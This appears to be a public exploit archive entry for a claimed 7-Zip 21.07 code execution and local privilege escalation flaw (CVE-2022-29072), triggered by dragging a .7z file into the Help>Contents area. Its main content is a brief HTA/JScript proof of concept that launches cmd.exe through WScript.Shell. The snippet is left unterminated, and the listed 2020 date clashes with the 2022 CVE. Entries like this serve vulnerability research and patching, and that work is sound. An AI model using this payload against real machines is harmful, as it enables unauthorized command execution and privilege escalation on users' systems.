7-Zip 21.07 Code Execution / Privilege Escalation

7-Zip version 21.07 suffers from a code execution vulnerability that allows for local privilege escalation.

MD5 | 05e73c1fa4b7f9ff85ff84aa79074aff

# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation
# Exploit Author: Kagan Capar
# Date: 2020-04-12
# Vendor homepage: https://www.7-zip.org/
# Software link: https://www.7-zip.org/a/7z2107-x64.msi
# Version: 21.07 and all versions
# Tested On: Windows 10 Pro (x64)
# References: https://github.com/kagancapar/CVE-2022-29072

# About:
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.

# Proof of Concept:
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);

Related Posts